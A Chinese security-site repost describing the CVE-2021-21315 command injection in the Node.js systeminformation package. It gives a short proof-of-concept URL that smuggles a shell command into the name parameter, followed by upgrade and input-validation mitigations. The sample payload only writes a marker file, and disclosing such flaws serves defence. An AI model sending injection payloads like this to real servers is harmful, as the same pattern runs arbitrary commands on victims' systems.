Node.js命令注入漏洞（CVE-2021-21315-POC）

2022年5月23日10:56:40评论83 views字数 525阅读1分45秒阅读模式

Node.js库中的systeminformation软件包中存在一个命令注入漏洞（CVE-2021-21315）攻击者可以通过「systeminformation」中代码注入漏洞的存在意味着攻击者可以通过在组件使用的未初始化参数内小心翼翼地注入有效载荷来执行系统命令。

POC:

[PoC][Victim Site]/api/getServices?name=$(echo -e 'Sekurak' > pwn.txt)[Victim Site]/api/getServices?name[]=$(echo -e 'Sekurak' > pwn.txt)

Node.js命令注入漏洞（CVE-2021-21315-POC）

目前该漏洞已经修复，将systeminformation及时升级到5.3.1或更高版本。

https://www.npmjs.com/package/systeminformation

缓解措施

如果无法升级，可以检查或清理传递给si.inetLatency()、si.inetChecksite()、si.services()、si.processLoad()的参数，只允许使用string，拒绝任何数组。

本文始发于微信公众号（Khan安全攻防实验室）：Node.js命令注入漏洞（CVE-2021-21315-POC）

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

本文由 admin 发表于 2022年5月23日10:56:40
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
Node.js命令注入漏洞（CVE-2021-21315-POC）https://cn-sec.com/archives/534895.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

漏洞复现 || XWiki Platform系统远程代码执行 POC